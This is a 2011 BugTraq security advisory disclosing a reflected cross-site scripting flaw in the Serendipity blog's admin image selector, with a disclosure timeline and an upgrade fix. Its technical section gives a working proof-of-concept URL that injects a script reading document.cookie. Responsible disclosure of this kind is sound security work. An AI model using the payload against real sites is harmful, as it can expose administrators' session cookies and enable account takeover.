BugTraq
Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability Nov 02 2011 08:40PM
sschurtz t-online de (1 replies)
Advisory: Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2011-015
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.5.5
Vendor URL: http://www.s9y.org
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

The parameter "serendipity[filter][bp.ALT]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

http://<target>/serendipity/serendipity_admin_image_selector.php?serendi
pity[filter][bp.ALT]=</script><script>alert(document.cookie)</script>&go
=+-+Go!+-+

=========
Solution:
=========

Upgrade to Serendipity 1.6

====================
Disclosure Timeline:
====================

22-Sep-2011 - informed developers
27-Oct-2011 - fixed by vendor
02-Nov-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.s9y.org
http://blog.s9y.org/archives/233-Serendipity-1.6-released.html
http://www.rul3z.de/advisories/SSCHADV2011-015.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus